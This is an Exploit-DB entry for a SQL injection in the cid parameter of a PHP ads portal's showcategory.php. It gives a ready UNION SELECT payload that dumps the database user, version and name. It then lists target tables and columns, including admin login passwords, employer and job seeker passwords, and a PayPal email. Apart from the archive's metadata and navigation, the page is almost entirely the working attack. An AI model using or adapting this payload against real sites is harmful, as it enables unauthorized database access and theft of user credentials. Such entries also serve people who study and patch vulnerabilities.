Pre ADS Portal - 'cid' SQL Injection

EDB-ID:

10872

CVE:

N/A

EDB Verified:

Author:

Hussin X

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-12-31

Vulnerable App:

#   Mega ADS Portal (cid) Remote SQL Injection Vulnerability

#========================================================

#    Author: Hussin X

#    Home :  iq-ty.com/vb<http://iq-ty.com/vb>

#    email:  darkangel_g85[at]Yahoo[DoT]com


#    Vendor : http://www.preprojects.com/ads.asp



Exploit:


server/Script/showcategory.php?cid=-21+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6--

__________________________
table_name : column_name

configuration:paypal_email
configuration:vendorid
configuration:site_name
configuration:email
job_admin_login:aid
job_admin_login:apass
job_admin_login:name
job_admin_login:email
job_aplicants:job_id
job_education:uname
job_careerlevel:clname
job_employer_info:epass
job_employer_info:CompanyName
job_seeker_info:uname
job_seeker_info:upass
job_tempacc:user_id


end

 IQ-SecuritY FoRuM

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services